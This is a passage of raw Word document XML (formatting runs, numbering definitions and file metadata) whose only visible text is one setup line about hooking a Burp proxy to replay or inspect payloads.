      <w:r w:rsidRPr="00715C2B">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Proxy (Burp) hooked if you need to replay/inspect payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478C0B96" w14:textId="77777777" w:rsidR="00715C2B" w:rsidRPr="00715C2B" w:rsidRDefault="00715C2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono SemiLight" w:hAnsi="Cascadia Mono SemiLight" w:cs="Cascadia Mono SemiLight"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00715C2B" w:rsidRPr="0071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66AED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BA2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83CE9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D42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66F45"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1138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B0FA5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F3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805287">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1656765489">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1879202609">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="949552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2B"/>
    <w:rsid w:val="00715C2B"/>
    <w:rsid w:val="007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35C6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1F7DE84D-429E-4217-A920-3719957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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-13T19:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-13T19:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>